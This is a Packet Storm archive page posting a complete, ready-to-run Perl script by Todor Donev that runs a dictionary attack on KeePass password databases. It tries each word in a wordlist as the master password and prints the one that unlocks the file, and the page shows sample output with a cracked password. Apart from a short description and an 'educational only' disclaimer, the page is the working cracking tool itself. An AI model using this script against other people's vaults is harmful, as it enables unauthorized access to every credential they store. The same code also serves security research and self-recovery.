what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

KeePass Simple Dictionary Password Enumerator

KeePass Simple Dictionary Password Enumerator
Posted Apr 4, 2018
Authored by Todor Donev

This is a simple perl script to perform dictionary attacks against the KeePass password manager.

tags | cracker, perl
SHA-256 | 6543608fbc7bd69c9aed01176048fc5dbb4c5cfcf6b3eb1751f46ee2b6e9c7cd

KeePass Simple Dictionary Password Enumerator

Change Mirror Download
#!/usr/bin/perl
#
# KeePass simple dictionary password enumerator
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
# KeePass is a free open source password manager,
# which helps you to manage your passwords in a
# secure way. You can put all your passwords in one
# database, which is locked with one master key or
# a key file. So you only have to remember one single
# master password or select the key file to unlock
# the whole database. The databases are encrypted
# using the best and most secure encryption algorithms
# currently known (AES and Twofish).
#
# Description:
# Dictionary Attacks are a method of using a program
# to try a list of words on the interface or program
# that is protecting the area that you want to gain
# access to. The most simple password crackers using
# dictionary attacks use a list of common single words,
# aka a "dictionary". More advanced programs often use
# a dictionary on top of mixing in numbers or common
# symbols at the beginning or end of the guessed words.
# Some can even be given a set of personal information
# or a profile of the user and pick out important words
# to guess, even if they are not proper words, such as
# pronouns like last names and names of relatives.
# A weakness of dictionary attacks is that it obviously
# relies on words supplied by a user, typically real words,
# to function. If the password is misspelled, is in another
# language, or very simply uses a word that is not in the
# dictionary or profile, it cannot succeed. Most of the
# time, even using two words in one password can thwart
# a dictionary attack.
#
#
# [todor@paladium ~]$ perl keepass.pl NewDatabase.kdbx wordlist.txt
# [+] KeePass simple dictionary password enumerator
# [*] ======
# [?] Trying admin
# [?] Trying 123456dqwdqwd
# [?] Trying dhasdasdasdadasdassfsadfdsf
# [?] Trying adsfdasdasdasdasd
# [?] Trying sdafqwdqwdqw
# [?] Trying sdadqwdqwdqdqw
# [?] Trying fi3oj12gyu3123oiu1298ud89asuda9sduas98duas
# [?] Trying sadfd87asdyhoijwqd98asud8asd
# [?] Trying sadka98sud89asud98asdhjasidasodll
# [?] Trying gfdkasjiohduiasdhaod
# [?] Trying wdpasi9ud8uas7dhuasid
# [?] Trying 3qgpdokasijdhuaygdqhwoidjpasjd
# [?] Trying ewgdasdasdczxczxc
# [?] Trying weczcxcasascsdvsdgdsfhsgfhdfd
# [?] Trying gwehdfhfghergrwegagdsgdfgdfsgdfgsd
# [?] Trying ggdsgdsfgdsfgdsfgsdf
# [?] Trying gdfsgsddwqdqwdqwd
# [*] ======
# [!] Author: Todor Donev <todor.donev at gmail.com>
# [!] https://ethical-hacker.org/
# [!] https://fb.com/ethicalhackerorg
# [*] ======
# [*] Password for NewDatabase.kdbx is Ethical-Hacker-Bulgaria-2o18
#
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Requirements:
# cpan install XML::Parser
# cpan install Crypt::Rijndael
# cpan install File::KeePass
#

use warnings;
use strict;
use File::KeePass;
use open ':std', ':encoding(UTF-8)';

my $k = File::KeePass->new;
my ($p, $w) = @ARGV;
print "[+] KeePass simple dictionary password enumerator\n";
&banner and die "[!] Usage: perl $0 <Keepass DBv1 or DBv2> <Wordlist>" if @ARGV != 2;
open (KEEPASSDB, " <$p") or die "[-] Error: $p $!";
die "[-]Error: The database is empty." if (-z $p);
close (KEEPASSDB);
open (WORDLIST, " <$w") or die "[-] Error: $w $!";
die "[-] Error: Wordlist is empty" if (-z $w);
my @file = <WORDLIST>;
print "[*] ======\n";
foreach my $c(@file)
{
chomp $c;
if (! eval { $k->load_db($p, $c) }) {
print "[?] Trying $c\n";
} else{
&banner and die "[*] Password for $p is $c\n";
}
}
close (WORDLIST);
&banner and die "[-] Sorry, $@";

sub banner{
print "[*] ======\n";
print "[!] Author: Todor Donev <todor.donev at gmail.com>\n";
print "[!] https://ethical-hacker.org/\n";
print "[!] https://fb.com/ethicalhackerorg\n";
print "[*] ======\n";
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close